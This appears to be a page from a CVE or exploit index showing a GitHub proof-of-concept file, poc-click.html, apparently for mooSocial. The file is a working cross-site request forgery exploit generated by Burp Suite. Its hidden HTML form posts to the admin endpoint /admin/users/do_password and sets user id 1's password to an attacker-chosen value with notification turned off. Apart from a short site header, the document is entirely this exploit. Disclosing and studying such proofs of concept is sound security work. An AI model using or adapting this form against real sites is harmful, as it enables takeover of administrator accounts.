4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc-click.html HTML
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/');</script>
    <form action="http://URL/moosocial/admin/users/do_password" method="POST">
      <input type="hidden" name="data&#91;id&#93;" value="1" />
      <input type="hidden" name="data&#91;password&#93;" value="CHANGEPASSWORD" />
      <input type="hidden" name="data&#91;password2&#93;" value="CHANGEPASSWORD" />
      <input type="hidden" name="data&#91;notify&#93;" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>